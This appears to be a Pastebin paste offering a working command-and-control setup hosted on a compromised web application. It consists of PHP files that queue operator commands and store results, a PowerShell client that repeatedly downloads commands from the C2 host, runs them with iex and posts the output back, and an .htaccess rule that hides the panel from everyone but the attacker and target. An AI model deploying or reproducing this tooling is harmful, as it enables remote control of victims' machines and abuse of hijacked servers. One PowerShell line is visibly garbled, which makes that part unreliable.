API tools faq
paste
Vegeta_Ssj

C&C Server On Compromised Webapplication | Shared Hosting

Vegeta_Ssj
Jul 13th, 2020 (edited)
319
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 2.52 KB | None | 0 0
raw download clone embed print report
  1.  ________________________________________
  2. / Vegeta_Ssj : Command to Control Server \
  3. \ On Compromised Webapplication          /
  4.  ----------------------------------------
  5.         \   ^__^
  6.          \  (oo)\_______
  7.             (__)\       )\/\
  8.                 ||----w |
  9.                 ||     ||
  10.  
  11. email: vegeta_ssj@riseup.net
  12. jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
  13. https://saiyajinz.sytes.net
  14.  
  15. https://i.postimg.cc/XYgzjC5c/1.png
  16.  
  17. Attacker/Compromised WebApp:
  18.  
  19. [windrcmm@server163 c2]$ ls
  20. command.txt  index.php  json.php  json.txt  output.txt  post.php
  21.  
  22. index.php | Simple page that will send post request with command and display output from infected host.
  23.  
  24. <!DOCTYPE html>
  25. <head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><title>c&c</title>
  26. <meta http-equiv="refresh" content="10" />
  27. </head>
  28. <body>
  29. <center>
  30. <form name="yolo" id="banjolo"action="http://localhost/c2/post.php" method="post">
  31. <p>
  32. <b>Enter Command:</b><br>
  33. <input type="text" name="lolo" id="banjolo" class="input" value="" size="112" autocapitalize="off" />
  34. </p></p></form>
  35. <div><object width="700" height="700" data="/c2/json.txt"></object></div>
  36. </center>
  37. </body
  38. </html>
  39.  
  40. post.php | The php script that will receive the post request with command and save it to the txt file:
  41.  
  42. <?php
  43. header ('Location: http://localhost/c2');
  44. $handle = fopen("/home/windrcmm/www/c2/command.txt", "w");
  45. foreach($_POST as $variable => $value) {
  46. fwrite($handle, $variable);
  47. fwrite($handle, "=");
  48. fwrite($handle, $value);
  49. fwrite($handle, "\r\n");
  50. }
  51. fclose($handle);
  52. exit;
  53. ?>
  54.  
  55. json.php | A php script that will receive data in json format sent from an infected station and save it to a text file.
  56.  
  57. <?php
  58. $jsonString = file_get_contents("php://input");
  59. $myFile = "json.txt";
  60. file_put_contents($myFile,$jsonString);
  61. ?>
  62.  
  63. Target/ Powershell Client:
  64.  
  65. #CremeDeLaCreme c&c client
  66.  
  67. while($true)
  68. {
  69. $res=Invoke-WebRequest “http://localhost/c2/command.txt”
  70. $www = $res.ParsedHtml.body.innerText;$request = $www -replace ‘command=
  71. $execute = $request | iex | Out-String
  72. $param = @{
  73.     Uri         = "https://localhost/c2/json.php"
  74.     Method      = "Post"
  75.     Body        = $execute
  76.     ContentType = "application/json"
  77. }
  78. Invoke-RestMethod @param
  79. }
  80.  
  81. .htaccess | I secure the path to my c2 by allowing only my and my target ip addresses. You can add second layer by basic authentication.
  82.  
  83. RewriteEngine on
  84. RewriteCond %{REMOTE_ADDR} !185.10.68.218$
  85. RewriteCond %{REMOTE_ADDR} !98.98.98.98$
  86. RewriteRule ^/?c2 - [F]
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!